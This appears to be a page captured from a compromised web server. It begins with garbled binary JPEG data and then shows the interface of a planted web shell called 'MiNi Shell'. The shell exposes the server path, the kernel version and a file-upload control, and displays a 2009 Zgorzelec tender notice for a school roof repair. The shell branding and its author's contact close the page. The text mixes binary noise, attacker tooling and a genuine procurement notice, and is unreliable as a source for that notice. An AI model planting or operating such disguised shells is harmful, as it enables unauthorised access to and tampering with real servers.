JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/54053-N-2009.html

<p class="kh_header"><b>Zgorzelec: Remont Gimnazjum nr 3 - remont dachu budynku głównego</b><br>
<b>Numer ogłoszenia: 54053 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Gimnazjum nr 3 - remont dachu budynku głównego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest  remont Gimnazjum nr 3 w Zgorzelcu przy ul. 
    Piłsudskiego 1.  
2. Zakres przedmiotu zamówienia obejmuje remont dachu budynku głównego; w skład 
   którego wchodzą: 
   1/  rozbiórka pokryć dachowych,  
   2/ demontaż  przewodów instalacji odgromowej, 
   3/ rozbiórka obróbek blacharskich murów ogniowych, okapów, kołnierzy, gzymsów 
       itp., 
   4/ rozbiórka rur spustowych,  rynien z blachy i elementów więźb dachowych, 
   5/ wymiana elementów konstrukcyjnych dachu,  
   6/ montaż desek okapowych, 
   7/ impregnacja ogniochronna i grzybobójcza ołacenia i konstrukcji dachu, 
   8/ pokrycie dachu dachówką karpiówką ceramiczną w ilości 1300,56m2 , 
   9/ pokrycie dachu papą termozgrzewalną dwuwarstwowo,
 10/ pokrycie dachu blachą tytan-cynk grub. 0,60mm, 
 11/ gruntowanie podłoży hydrofobowym środkiem gruntującym-gzymsy, 
 12/ dwukrotne malowanie zwykłe farbą silikatową-gzyms, 
 13/ obróbka z blachy tytan-cynk, 
 14/ montaż rynien dachowych, rur spustowych, zbiorniczków przy rynnach z blachy 
      tytan-cynk, 
 15/ dwukrotne malowanie farbą olejną rur kanalizacyjnych żeliwnych, 
 16/ osadzenie wyłazu dachowego i okienek w połaci dachowej, 
 17/ montaż kominków  wentylacyjnych w pokryciu dachowym, 
 18/ wykonanie  przewodów instalacji odgromowej,    
 19/ wykonanie badań i pomiarów instalacji piorunochronnej, 
 20/ wywiezienie gruzu pryzmowanego samochodami skrzyniowymi. 
3.Szczegółowy zakres prac został zawarty w przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót - załącznik nr 7 do SIWZ. 
4.Przed przystąpieniem do w/w robót Wykonawca jest zobowiązany zapoznać się ze 
   specyfikacją techniczną  wykonania i odbioru robót, oraz dokonać wizji lokalnej 
   terenu budowy, by uzyskać istotne informacje, które mogą być konieczne do 
   przygotowania oferty. Wizję lokalną Wykonawca dokona na   koszt własny. 
5.Wykonawca jako wytwarzający odpady jest zobowiązany do przestrzegania 
   przepisów prawnych wynikających z następujących ustaw:
   a/ Ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz.U.Nr 62, poz.627 z 
       póź.zm.)       
   b/ Ustawy z dnia 27.04.2001r. o odpadach (Dz.U. Nr 62, poz. 628 z póź zm.)

Zamówienie powyżej 14.000 euro a poniżej kwot określonych w art. 11 ust. 8 Pzp..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.12.10-9, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona  wadium w wysokości  7000,00 zł. PLN (słownie: 
   siedem tysięcy  zł.)
2.Wadium musi obejmować okres związania ofertą.
   Uwaga! Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i 
   zobowiązania  Zamawiającego i Wykonawcy  dot. w/w ustaleń będą podlegały - 
   odpowiednio nowym terminom.
3.Termin wniesienia wadium upływa wraz z terminem składania ofert, o godzinie 
   wyznaczonej na składanie ofert.
4.Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na 
   przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu 
   związania ofertą  zostanie przez Zamawiającego wykluczony z ubiegania się o 
   udzielenie zamówienia   publicznego. 
5.W zależności od woli wykonawcy wadium może być wnoszone w formach:
    - pieniądzu,
    - poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
      kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
   - gwarancjach bankowych,
   - gwarancjach ubezpieczeniowych,
   - poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
     ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
     Przedsiębiorczości  (Dz.U. z 2007r. Nr 42, poz. 275)
UWAGA!Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  
6.Warunkiem uznania wniesienia wadium będzie załączony do oferty dokument
   potwierdzający wniesienie wadium do Zamawiającego.
7.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
   zamawiającego Nr 35124012971111000025654013 w banku PEKAO S.A. I
   O/Zgorzelec.
   Na przelewie należy  umieścić informację :
   Wadium na remont Gimnazjum nr 3-remont dachu budynku głównego
8. Zamawiający zwraca wadium jeżeli:
    - upłynął termin związania ofertą 
    - zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie
       należytego wykonania tej umowy 
    - zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty 
       zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
 9.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
    a/ który wycofał ofertę przed upływem terminu składania ofert,
    b/ który został wykluczony z postępowania,
    c/ którego oferta została odrzucona.
10 Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym 
    zwrócono wadium na podstawie art.46 ust.2 pkt. 2 i 3 ustawy Pzp, jeżeli w wyniku 
    ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia  
    wykonawcy lub odrzucenia oferty. Wykonawcy wniosą wadium w terminie 
    określonym przez   Zamawiającego
11 Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
     za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
     odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
     dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, 
     chyba że udowodni, ze wynika to z przyczyn należących po jego stronie. 
13 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
     oferta  została wybrana :
     a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
         określonych w ofercie, 
     b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
     c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
         przyczyn   leżących  po stronie wykonawcy.
14 Wadium wybranego wykonawcy zostanie zwrócone niezwłocznie po wniesieniu
    wymaganego zabezpieczenia należytego wykonania umowy i zawarciu przez niego
    umowy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.1 O udzielenie Zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki 
udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp,  i nie podlegają   
wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz złożą dokumenty potwierdzające 
spełnienie  tych warunków.
W szczególności zamawiający wymaga, aby wykonawcy wykazali, że:
1/  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
     ustawy nakładają obowiązek posiadania takich uprawnień,
2/  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
     technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią 
     pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego i osób   zdolnych do wykonania zamówienia
3/  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia,  
4/ nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
1.2 Opis sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu:
Zamawiający dokona oceny spełnienia każdego z  warunków na podstawie 
załączonych do oferty dokumentów, o których mowa w pkt. 2  metodą 
spełnia / nie  spełnia.
Brak załączenia przez wykonawcę któregokolwiek z dokumentów zostanie uznane
przez zamawiającego jako niespełnienie warunku, co będzie skutkować           
wykluczeniem  wykonawcy z postępowania, z zastrzeżeniem art.  26 ust. 3 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy 
    w celu potwierdzenia spełnienia warunków udziału w postępowaniu;        
     zgodny z  wymogami art. 22 ust. 1 ustawy Prawo zamówień publicznych i  treścią  
     Rozporządzenia  Prezesa Rady  Ministrów z dnia 19 maja 2006 r.   w sprawie 
     rodzajów dokumentów,  jakich może  żądać  zamawiający od wykonawcy  oraz 
     form,  w jakich te dokumenty mogą być  składane  (Dz. U. z 2006r. Nr 87, poz. 
     605 oraz Dz. U. z  2008r. Nr 171, poz. 1058).
2.1W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1 
     podpunkt 1, Zamawiający żąda załączenia :      
     1/aktualnego  odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie 
        do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
        do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego 
        nie wcześniej niż 6  miesięcy przed upływem terminu składania wniosków o 
        dopuszczenie  do udziału w   postępowaniu o udzielenie zamówienia albo 
        składania ofert (§ 1 ust.1,  pkt 2  rozporządzenia Prezesa Rady Ministrów z dnia 
        24 maja 2006r.  Dz.U. Nr 87,  poz. 605) .
        Za aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
        do ewidencji działalności gospodarczej uznaje się zarówno dokument 
        wystawiony odpowiednio nie wcześniej  niż sześć m-cy przed upływem terminu 
        składania ofert, jak również dokument, wystawiony  w okresie wcześniejszym, 
        jeżeli istnienie określonych w  nim okoliczności potwierdzone   zostanie przez 
        właściwy organ w wymaganym terminie i  opatrzone urzędową adnotacją  
        potwierdzającą  jego aktualność.   
 Uwaga! W przypadku składania oferty przez Wykonawców występujących 
            wspólnie,    w/w  dokument składa każdy z przedsiębiorców  tworzących
            konsorcjum.
    2/ zaświadczenia z Krajowego Rejestru Karnego
        a/  w zakresie określonym w art. 24 ust. 1 pkt  4-8   ustawy Pzp, wystawione 
             nie wcześniej niż  6  miesięcy przed  terminem składania  ofert, 
        b/ zaświadczenia z Krajowego Rejestru Karnego w zakresie określonym w art. 24
            ust.1 pkt 9  ustawy Pzp, wystawione nie wcześniej niż  6 miesięcy przed 
            terminem składania ofert (§ 1  ust 1. pkt 4 i 5 rozporządzenia Prezesa Rady 
            Ministrów z dnia 24 maja 2006 r. Dz.U. Nr  87,  poz.   605) 
Uwaga! W przypadku składania oferty przez Wykonawców występujących wspólnie, 
           w/w  dokument składa każdy z przedsiębiorców  tworzących konsorcjum.
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium 
Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa w pkt. 2.1  
podpunkty   1 i 2b składa dokument lub dokumenty wystawione w kraju, w którym ma  
siedzibę  lub  miejsce  zamieszkania, potwierdzające  odpowiednio że:
-nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej   
 niż  6 miesięcy przed upływem terminu składania ofert, 
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie  
 wcześniej niż 6  miesięcy przed upływem terminu składania ofert. 
W zakresie dokumentu określonego w pkt. 2.1 podpunkt 2a Wykonawca składa   
zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się wyżej wymienionych dokumentów, zastępuje się
je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym 
organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca   ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy  przed 
upływem terminu składania ofert.
2.2 W celu potwierdzenia, warunku udziału w postępowaniu określonego w pkt. 1.1
      podpunkt 2,  Zamawiający żąda:
1) wykazu  wykonanych   (zakończonych) robót  budowlanych w okresie
    ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie 
    zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
    odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym 
    przedmiot  zamówienia,  z podaniem ich wartości oraz  daty i miejsca wykonania 
    oraz załączeniem  dokumentów   potwierdzających,  że roboty te zostały   
    wykonane  należycie   -  wg załącznika  nr 4   do SIWZ
    Zamawiający wymaga, aby  wykaz zawierał: 
    - jedną   wykonaną  (zakończoną) robotę budowlaną stanowiącą przedmiot 
      zamówienia tj. wykonanie pokrycia dachowego dachówką ceramiczną 
      o wartości nie mniejszej  niż 300 000,00 zł brutto.   
  2) dołączenia wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu 
      zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, 
      doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także 
      zakresu  wykonywanych przez nich  czynności. 
      Zamawiający wymaga: 
      - aby minimum 1 osoba, która będzie wykonywać zamówienie posiadała  prawo  
        wykonywania  samodzielnych funkcji technicznych w budownictwie do 
        kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej co 
        najmniej  w ograniczonym zakresie. 
        W celu potwierdzenia tego warunku należy przedstawić kopię dokumentu 
        potwierdzającą uprawnienia budowlane w/w osoby.              
Uwaga! W przypadku składania oferty przez Wykonawców występujących 
           wspólnie, w/w  warunek, musi spełnić co najmniej jeden z 
           przedsiębiorców. 
    3) dołączenia pisemnego zobowiązania innych podmiotów do udostępnienia osób 
        zdolnych  do wykonania  zamówienia, jeżeli w wykazie  o którym mowa w pkt. 
        11.2 podpunkt 2 Wykonawca wskazał osoby, którymi będzie dysponował - 
        załącznik nr 5.
2.3W celu potwierdzenia, warunku udziału w postępowaniu określonego  w pkt. 
    1.1 Zamawiający żąda:      
    1) oświadczenia Wykonawcy, o spełnieniu warunków udziału w postępowaniu 
        zgodnie z art. 22 ust. 1 i nie podleganiu wykluczeniu z art. 24 ust. 1 i 2 ustawy 
        Pzp. złożone na formularzu stanowiącym załącznik nr 3  do SIWZ . Wykonawcy, 
        którzy wspólnie ubiegają się o udzielenie zamówienia wypełniają załącznik nr 3A.
 3.Wymagania dotyczące oferty
    Do oferty Wykonawca musi złożyć następujące dokumenty:   
    1. wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru) 
    2. informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
       (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
       konsorcjum)
   3. oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
       zamówień   publicznych - załącznik nr 2 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec
ul. Domańskiego 6 pokój nr 6.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
Punkt Obsługi Interesanta
59-900 Zgorzelec
ul. Domańskiego 7.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com